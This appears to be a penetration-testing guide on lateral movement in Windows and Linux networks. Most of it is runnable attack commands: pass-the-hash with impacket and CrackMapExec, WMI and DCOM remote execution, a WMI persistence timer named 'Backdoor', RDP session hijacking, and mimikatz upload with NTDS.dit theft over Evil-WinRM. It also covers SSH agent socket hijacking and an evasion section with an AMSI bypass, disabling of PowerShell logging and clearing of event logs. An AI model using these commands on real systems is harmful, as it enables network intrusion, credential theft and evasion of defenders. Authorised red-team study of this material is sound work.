Lateral Movement Techniques: Pass-the-Hash, WMI, PSExec, and RDP Hijacking

Lateral movement is the phase of a penetration test where you pivot from one compromised system to another, expanding your foothold across the network. The ability to move laterally — and do it quietly — is what determines whether a red team engagement demonstrates real business risk or stays contained to a single host. This guide covers every major technique used in modern Windows environments.

Why Lateral Movement Matters

Initial access is just the beginning. Real attack objectives — domain admin, sensitive data, critical infrastructure — are rarely on the first machine you compromise. Lateral movement techniques let you:

• Reach high-value targets (domain controllers, file servers, database servers)
• Collect credentials from multiple systems (expanding your hash collection)
• Establish redundant footholds for persistence
• Demonstrate true impact of an initial compromise to stakeholders

Pass-the-Hash

NTLM authentication accepts a hash directly — no need to crack it first. With a stolen NTLM hash, authenticate to remote systems as if you had the password.

# psexec.py — creates a service, returns SYSTEM shell
# Noisy: creates Windows service + file in ADMIN$
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:NTLMHASH CORP/[email protected]

# smbexec.py — executes commands via SMB batch files, no binary dropped
smbexec.py -hashes :NTLMHASH CORP/[email protected]

# wmiexec.py — WMI-based execution, semi-interactive
# Quieter than psexec, doesn't create a service
wmiexec.py -hashes :NTLMHASH CORP/[email protected] "whoami /all"

# atexec.py — executes via Windows Task Scheduler
atexec.py -hashes :NTLMHASH CORP/[email protected] "ipconfig /all"

# Spray across a subnet with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLMHASH --local-auth
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLMHASH  # domain auth

WMI Lateral Movement

Windows Management Instrumentation (WMI) is a legitimate management framework present on every Windows system. It leaves minimal forensic traces compared to psexec.

# wmiexec.py — impacket's WMI-based shell
wmiexec.py CORP/Administrator:'Password123'@192.168.1.20
wmiexec.py -hashes :NTLMHASH CORP/[email protected]

# Native wmic.exe (from a compromised Windows box)
wmic /node:192.168.1.20 /user:CORP\Administrator /password:Password123   process call create "powershell -enc BASE64PAYLOAD"

# PowerShell Invoke-WMIMethod
Invoke-WMIMethod -Class Win32_Process -Name Create   -ArgumentList "powershell -enc BASE64PAYLOAD"   -ComputerName 192.168.1.20   -Credential (Get-Credential)

# WMI event subscription — persistence + execution
# Register a WMI event that fires on system events (stealthy persistence)
$TimerArgs = @{IntervalBetweenEvents = 3600000; TimerId = "Backdoor"}
$Timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments $TimerArgs

DCOM Lateral Movement

Distributed COM (DCOM) allows remote instantiation of COM objects. Several DCOM applications accept remote command execution with admin rights:

# Via impacket dcomexec.py
dcomexec.py -hashes :NTLMHASH CORP/[email protected] "whoami"
dcomexec.py -object MMC20 CORP/Administrator:'Password123'@192.168.1.20 "ipconfig"

# PowerShell — MMC20.Application DCOM object
$dcom = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.20"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c whoami > C:\output.txt","7")

# ShellWindows DCOM object
$dcom = [activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application","192.168.1.20"))
$dcom.ShellExecute("cmd","/c whoami > C:\output.txt","C:\Windows\System32","",0)

RDP Lateral Movement and Session Hijacking

RDP provides a graphical session. Beyond standard login, attackers can hijack existing RDP sessions without knowing the user's password — even locked sessions.

# Standard RDP connection
xfreerdp /u:Administrator /p:'Password123' /v:192.168.1.20
xfreerdp /u:Administrator /pth:NTLMHASH /v:192.168.1.20  # Pass-the-Hash

# List active RDP sessions (run on the target as SYSTEM)
query session
qwinsta

# Output:
# SESSIONNAME  USERNAME     ID  STATE
# services                   0  Disc
# console      jdoe          1  Active
# rdp-tcp#12   admin         2  Active

# Hijack a session without password (requires SYSTEM privileges)
# Switch to session ID 2 as SYSTEM
tscon 2 /dest:rdp-tcp#12

# Via PsExec to get SYSTEM first, then hijack
PsExec.exe -s cmd.exe
# Now you're SYSTEM — tscon any session without auth

# Automated via sc.exe service trick
sc create hijack binPath= "cmd /k tscon 2 /dest:rdp-tcp#12"
sc start hijack

PowerShell Remoting (WinRM)

# Enter-PSSession — interactive remote PowerShell
Enter-PSSession -ComputerName 192.168.1.20 -Credential CORP\Administrator

# Invoke-Command — run commands on one or many systems
Invoke-Command -ComputerName 192.168.1.20 -ScriptBlock {whoami; hostname} -Credential CORP\Administrator

# Invoke-Command across multiple hosts
Invoke-Command -ComputerName (Get-Content hosts.txt)   -ScriptBlock {Get-LocalGroupMember -Group Administrators}   -Credential CORP\Administrator

# Evil-WinRM — full-featured WinRM shell with file transfer
evil-winrm -i 192.168.1.20 -u Administrator -p 'Password123'
evil-winrm -i 192.168.1.20 -u Administrator -H NTLMHASH

# Upload/download files in Evil-WinRM
upload /local/mimikatz.exe C:\Windows\Temp\mimi.exe
download C:\Windows\NTDS\NTDS.dit /local/NTDS.dit

SSH Agent Forwarding Abuse

In Linux environments, SSH agent forwarding allows using local SSH keys on remote hosts. If you compromise a user with agent forwarding enabled, you can steal their agent socket and use it to authenticate to other systems as that user:

# Find agent sockets on a compromised Linux host
find /tmp -name 'agent.*' 2>/dev/null
ls -la /tmp/ssh-*/

# Hijack an agent socket (need access to it — same user or root)
export SSH_AUTH_SOCK=/tmp/ssh-abc123/agent.1234
ssh-add -l  # list identities in the agent

# Use the agent to authenticate to other systems
ssh -A [email protected]   # connects using hijacked agent

# If you're root, you can hijack any user's agent
# Find the process owning the agent
ls -la /proc/*/fd | grep agent | awk '{print $9}' | xargs ls -la

Logging Artifacts and Detection Evasion

Understanding what traces each technique leaves helps you choose the right tool for the engagement's stealth requirements:

• psexec — Event IDs 7045 (service install), 4624/4648 (logon), ADMIN$ share access. Very noisy.
• wmiexec — Event ID 4624 (logon type 3), WMI activity log. Moderate noise.
• smbexec — Event IDs 4624, 4688 (process creation). Uses batch files in %SYSTEMROOT%.
• DCOM — Event IDs 4624, 4688. Harder to distinguish from legitimate DCOM traffic.
• WinRM/PSRemoting — Event ID 4624 (logon type 3), PowerShell operational logs, WSMan logs.
• RDP — Event IDs 4624, 4778 (session reconnect), RDP-related event log.

# Reduce detection footprint:
# Use HTTPS for WinRM (port 5986) to avoid plaintext capture
# Disable PowerShell logging temporarily (requires admin):
Set-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Name EnableScriptBlockLogging -Value 0

# Use AMSI bypass before loading tools
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Clear event logs (very noisy — flags defenders)
wevtutil cl System
wevtutil cl Security
wevtutil cl "Windows PowerShell"

For the credential sources that fuel lateral movement, see our Active Directory Penetration Testing guide covering Kerberoasting, AS-REP Roasting, and DCSync. SMB-specific techniques (including relay attacks) are in the SMB Exploitation Guide. Use the Active Directory Generator to build lateral movement command chains for your specific scenario.